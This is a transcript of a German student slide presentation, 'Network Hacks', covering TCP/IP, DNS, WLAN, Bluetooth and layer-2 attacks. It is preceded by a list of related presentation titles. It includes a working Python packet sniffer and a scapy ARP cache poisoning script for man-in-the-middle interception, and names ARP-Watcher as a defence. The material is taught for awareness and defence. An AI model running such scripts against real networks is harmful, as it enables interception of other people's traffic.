Network Hacks Referat von Kim Schröer – Aktuelle Probleme digitaler Medien 05.12.2013 -

Slides:



Advertisements
Ähnliche Präsentationen
Powerpoint-Präsentation
Advertisements

2. Link Layer Lernziele: Verstehen wie IP prinzipiell über eine Link Layer Verbindung übertragen wird.
2 Kommunikationssysteme bieten Kommunikationsdienste an, die das Senden und Empfangen von Nachrichten erlauben (sending & receiving messages) bestehen.
Kirsten Kropmanns Allgemeine Technologien II 21. April 2009
Vergleich von LAN - Protokollen
Architektur von Netzwerken
Paketorientierte Datenübertragung
Internet und seine Dienste
OSI-Schichtenmodell Unterschiedliche Rechner brauchen eine gemeinsame Basis, um sich miteinander zu „unterhalten“. Geklärt werden muss dabei u. a. Folgendes:
Einführung in die Netzwerktechnik 1 Der ARP-Prozess
1. Einführung Lernziele: Auffrischen des Wissens aus Rechnernetze
Schulen ans Netz Oberhausener Moderatoren
Einführung in die Technik des Internets
Applikationsschichten
TCP/IP-Ethernet.
Mit Schülern ein internetfähiges Netzwerk aufbauen
Learning By Doing TCP/IP Netzwerke mit TCP/IP Das Internet verwendet weitgehend das rund 30-jährige TCP/IP-Protokoll (TCP: Transmission Control Protocol,
DFÜ => Daten-Fern-Übertragung
Rechnerkommunikation I
Referent: Kiron Mirdha Betreuer: Rene Hilden Juli 2012
1 Übersicht Absicherung Internet Layer Absicherung Transport Layer Absicherung Application Layer.
Das OSI-Schichtenmodell
WAP = Wireless Application Protocol Protokollstack Ein Protokoll ...
Kollisions-und Broadcast-Domänen CCNA 8.2.2
Das OSI Schichtenmodell
Begriffe -Technische Geräte
Julia Grabsch Florian Hillnhütter Fabian Riebschläger
Internet-Protokolle und Sicherheitsaspekte
Präsentation von Lukas Sulzer
Grundlagen der Netzwerktechnik
Warum gibt es Netzwerke?
Abgeleitet aus dem OSI-Referenzmodell sieben Schichten
Netzwerke.
Unterschiedliche Netzwerke
Christian Schindelhauer Sommersemester Vorlesung
Provider und Dienste im Internet
Die 7 Schichten des OSI-Schichtmodells
Ethernet-Applikationsschichten
Seite 1 Prof. J. WALTER Kurstitel Stand: Oktober 2001 info Netzwerke Prof. J. Walter.
Das Client-Server-Prinzip und TCP/IP
Was heißt hacken? Referat von Jasmin Woock Universität zu Köln
Agenda 1. Definition (TCP/ IP Protokollfamilie) 2.
von Prof. Thomas Deutsch
Ein Referat von Rahul Chanana, Sebastian Callian und Steffen Klikar.
TCP/IP.
Schutzvermerk nach DIN 34 beachten TCP / IP. Schutzvermerk nach DIN 34 beachten TCP / IP und das OSI-Referenzmodell Process / Application Host-to-Host.
Sniffing & Spoofing Workshop
Kirsten Kropmanns Allgemeine Technologien II 9. März 2009
Lisa Huber DHBW Mannheim
Aufbau eines Netzwerkes
Präsentiert von Martilotti Pascal und Lin Stefan
IrDA Infrared Data Association von Halastar Mustafa.
Kornelia Bakowsk a ‌ WG13 ‌‌‌ Köln, Protokollfamilie Welche Protokolle benötige ich um eine Seite im Internet zu öffnen?
Internetzwerke.
Systeme II 2. Die physikalische Schicht Christian Schindelhauer Technische Fakultät Rechnernetze und Telematik Albert-Ludwigs-Universität Freiburg Version.
IS: Datenbanken, © Till Hänisch 2000 Windows Netzwerke TCP/IP oder was ?
Netzwerktechnik The Network Is The Computer. Etwas Statistik... Anteil der Deutschen, die 2001 im Internet sein werden: Ein Drittel Anzahl der Bundesbürger,
Fragenkatalog GK Informatik Zur Vorbereitung auf das mündliche Abitur.
LINUX II Harald Wegscheider
Center for Biotechnology Bielefeld Bioinformatics Service Netzwerk - Programmierung Netzwerke Alexander Sczyrba Jan Krüger.
Address Resolution Protocol (ARP) Verwendung Zuordnung von Netzwerkadressen zu Hardwareadressen Beispiel Ethernet Auflösung der IP-Adresse zur Ethernet-MAC-Adresse.
Internet Protocol. Funktion Netzwerkprotokoll zur Versendung von Datenpaketen, „Protokoll des Internets“, Schicht 3 Vermittlungsschicht im OSI-Modell,
1. Einführung Lernziele: Auffrischen des Wissens aus Rechnernetze
ISO / OSI Referenzmodell
Manuel Blechschmidt & Volker Grabsch CdE Sommerakademie 2006 Kirchheim
Verbindung mit einem Netzwerk
Netzwerke Netzwerkgrundlagen.
Ich brauche eine Web-Seite vom Server im Internet
Security Labor MitM-Demonstration
 Präsentation transkript:

Network Hacks Referat von Kim Schröer – Aktuelle Probleme digitaler Medien

 Verhindern von Angriffen durch (Er-)Kennen und Verstehen der Möglichkeiten

TCP/IP Tricks IP (Internetprotokoll) Verbindungsloses Protokoll (kennt keinen Zusammenhang zw. Zwei Paketen) Aufgaben (unteranderem): definiert Absender und Empfänger des Pakets & ermittelt durch Routing einen Weg zum Ziel (bzw. teilt mit, dass der Rechner nicht erreichbar ist) TCP (Transmission Control Protocol) Aufgaben: kümmert sich um den Aufbau einer Sitzung (Three-Way- Handshake) & die Nummerierung der Datenpakete (damit der Zielrechner sie in der richtigen Reihenfolge verarbeiten kann) & das Abschicken einer Bestätigung durch den Zielrechner (sobald Paket ankommt) & Neuschickung eines Datenpakets, wenn dies nicht der Fall ist & zuletzt adressiert TCP mit Hilfe von Ports die Anwendungsprogramme, sowohl des sendenden Rechners und empfangenen Rechners

TCP/IP-Tricks: Ein einfacher Sniffer HTTP ist nicht so sicher wie HTTPS! Plaintextprotokolle: ICQ, SMTP, IMAP/POP3 (Chatten, s lesen/verschicken) Angreifer  mitlesen bei unverschlüsseltem Netzwerkverkehr Netzwerksniffer: Tcpdump oder Wireshark

pip install impackt pcapy #!/usr/bin/python import sys import getopt import pcapy from impacket.ImpactDecoder import EthDecoder dev = "eth=0" filter = "arp" decoder =EthDecoder() # This function will be called for every packet # and just print it def handle_packet(hdr, data): print decoder.decode(data) def usage(): print sys.argv[0] + " -i -f " sys.exit(1) # Parsing parameter try: cmd_opts = "f:i:" opts, args = getopt.getopt(sys.argv[1:], cmd_opts) except getopt.GetoptError: usage() for opt in opts: if opt[0] == "-f": filter = opt[1] elif opt[0] == "-i": dev = opt[1] else: usage() # Open device in promisc mode pcap = pcapy.open_live(dev, 1500, 0, 100) # Set pcap filter pcap.setfilter(filter) #Start sniffing pcap.loop(0, handle_packet) Ein einfacher Sniffer dev = "eth=0“  Netzwerkkarte liest alle Pakete ein filter = "arp“  PCAP-Filter  Nur ARP- Pakete pcap = pcapy.open_live(dev, 1500, 0, 100)  Öffnet Netzwerkkarte zum Einlesen der Pakete  (Netzwerkinterface, snaplen, Promiscuous-Modus, Timeoutwert) Endlosschleife:  lesen von Paketen aus Netzwerkkarte  dekodiert jedes Paket mit Hilfe der EthDecoder-Klasse: handle_packet()

DNS (Domain Name System) Ändert schwer zu merkenden Zahlen einer IP- Adresse in anschaulichere und leichter zu merkende Namen wie (aber auch Namen in IP-Adressen).

DNS-Mappers Hostnamen einer Domain liest Wörterbuchdatei mit üblichen Servernamen ein hängt diese an Domainnamen versucht über eine DNS-Query diesen in die IP aufzulösen Erfolg: Rechner existiert

HTTP (Hyper Text Tranfer Protocol) Bekannteste Protokoll des Internets Einkaufsportale, Suchmaschinen, - und Forendienste, Blogs, Kalender, soziale Netzwerke usw. Die meisten Angriffe erfolgen heutzutage auf Webanwendungen Beliebteste Angriffstool: Webbrowser

WLAN- oder Wifi-Netze Heim- und Firmen-LANs Mobiltelefone VoIP-Anlagen in Supermärkten Werbetafeln in Bussen, Bahnen und an Haltestellen Überwachungskameras Wenige medizinische Geräte in Krankenhäusern Vorteil: günstig, individuell einsetzbar

WLAN- oder Wifi-Netze WLAN-Scanner: Sehr einfach durch das pythonwifi-Modul WLAN-Sniffer: liest passiv den Verkehr mit und gelangt an Informationen wie SSID, Channel und Client-IPs/-MACs Schutz: z.B. MAC-Address-Filter  Administrator muss MAC-Adresse des Client- Computers für das Netz freischalten

Bluetooth Drahtlose Sprach- und Datenübertragungstechnik In Mobiltelefonen, PDA, USB-Stick, Tastatur, Maus, Headset, Drucker, Fernsprecheinrichtung im Auto, Navigationsgerät, neumodische Werbeplakate usw. Class 2 Devices funken nur bis zu 10m, Class 1 dagegen 100m weit

Bluetooth Sichere Implementierung: Verbindung lässt sich verschlüsseln und authentifizieren Bluetooth-Adresse wird von der Firmware des Bluetooth-Geräts und nicht durch den Kernel gesetzt, was das Spoofen dieser Adresse erschwert, aber nicht unmöglich macht Gefahr: immer wieder Meldungen über Sicherheitslücken  z.B. als Öffner für Haus-, Garage- und Autotüren

OSI-Modell Layer 1 – Physical (Bitübertragungsschicht) Layer 2 – Data-Link (Sicherungsschicht) Layer 3 – Network (Vermittlungsschicht) Layer 4 – Transport (Transportschicht) Layer 5 – Session (Sitzungsschicht) Layer 6 – Presentation (Darstellungsschicht) Layer 7 – Application (Anwendungsschicht)

Layer-2-Angriffe Layer 2 – Data-Link (Sicherungsschicht)  Kümmert sich um die wirkliche Adressierung der Daten in einem Ethernet anhand von MAC-Adressen.

MAC-Flooder Switches haben wie alle Computer nur begrenzten Speicher Gilt auch für die MAC-Adressen-Tabelle Speicher voll gelaufen  Switches reagieren seltsam Reaktionen: komplette Dienstverweigerung; Aufgabe jeglicher Switchings und Rückfall in einen Hub-Modus

ARP (Address Resolution Protocol) vermittelt zw. Schicht 2 (Ethernet) und 3 (IP) Aufgabe: MAC-Adressen in IP-Adressen auflösen

- ARP (Address Resolution Protocol) - Quellrechner Zielrechner Hallo alle, hier ist Max! Ich will mit Moritz reden! Wer hat die MAC-Adresse von Moritz? „Hier meine MAC-Adresse: …“ ARP, Request who-has tell , length ARP, Reply is-at aa:bb:cc:aa:bb:cc, length 28

ARP  Angreifer One-Way-Man-in-the-Middle: Einsatz fake_ip  nur Pakete vom Client an fake_ip Bidirektionaler Man-in-the-Middle: Angreifer muss beiden Computern die eigene MAC-Adresse eintragen

#!/usr/bin/python import sys import time from scapy.all import sendp, ARP, Ether if len(sys.argv) < 3: print sys.argv[0] + “: “ sys.exit(1) iface = “eth0“ target_ip = sys.argv[1] fake_ip = sys.argv[2] ethernet = Ether() arp = ARP (pdst=target_ip, psrc=fake_ip, op=“is-at“) packet = ethernet / arp while True: sendp(packet, iface=iface) time.sleep(10) ARP-Cache-Poisoning  Paket wird konstruiert (packet)  besteht aus Ethernet() und ARP()-Header ARP-Header:  IP-Adresse des Opfers (target_ip) &  IP, für die alle Verbindungen des Opfers an den Angreifer geschickt werden (fake_ip) gesetzt OP-Code  is-at  Deklariert Paket als ARP-Response Endlosschleife: Paket wird alle 10 Sek. versendet

Verhindern - ARP-Watcher Tool merkt sich alle IP-zu-MAC-Auflösungen und meldet, wenn ein neues Gerät ans Netzwerk angeschlossen wird oder eine IP plötzlich eine andere MAC-Adresse besitzt teilt nur verdächtiges Verhalten mit, verhindert jedoch nicht direkt den Angriff

Noch Fragen?